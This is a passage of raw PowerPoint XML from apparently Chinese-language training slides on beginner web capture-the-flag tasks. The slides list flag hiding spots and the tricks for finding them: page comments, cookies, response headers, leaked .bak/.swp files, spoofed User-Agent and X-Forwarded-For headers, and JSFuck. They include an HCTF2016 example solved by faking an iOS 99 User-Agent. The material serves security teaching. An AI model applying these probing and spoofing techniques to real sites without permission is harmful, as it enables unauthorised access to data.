              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9D4C5AA-F6DF-E748-87DD-6ED1C822763E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="4599378"/>
            <a:ext cx="10469880" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Content-Length:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>请求长度</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="240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4921821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2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15B8DEB5-0F52-604C-8E06-F44E4891C047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1810265"/>
            <a:ext cx="8945880" cy="4540474"/>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查看页面源码，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在注释里</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>响应包，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、响应头中</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>备份文件（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.bak</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.swp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.swo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）泄露</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>根据提示修改请求头（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>X-Forwarded-For</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JSFuck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>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2240280" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>入门题目：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175383581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4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>例子（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>HCTF2016</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71200F30-DFE9-9C42-BEA3-5E472D98D80E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="4763" r="22144"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1810264"/>
            <a:ext cx="11427518" cy="2472175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A32181F-B905-224C-8C22-D5635D352424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="934720" y="3749040"/>
            <a:ext cx="9535160" cy="1718163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>根据提示：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ios99</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag(Maybe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>easily</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2099)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>猜想可能需要伪造成</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ios99</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的设备去访问</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3401178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4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>例子（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>HCTF2016</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DE48D0F-A8A2-A64B-BCE9-DA8662F27721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234440" y="1529655"/>
            <a:ext cx="9499894" cy="3692186"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBC92BE8-2FAF-2C47-89EE-C73A96890F88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234440" y="5206601"/>
            <a:ext cx="9535160" cy="1485920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Mozilla/5.0</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(iPhone;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>iPhone</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>99</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Mac</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>X)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AppleWebKit/601.1.46</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(KHTML,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Gecko)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Version/9.0</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Mobile/13D15</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
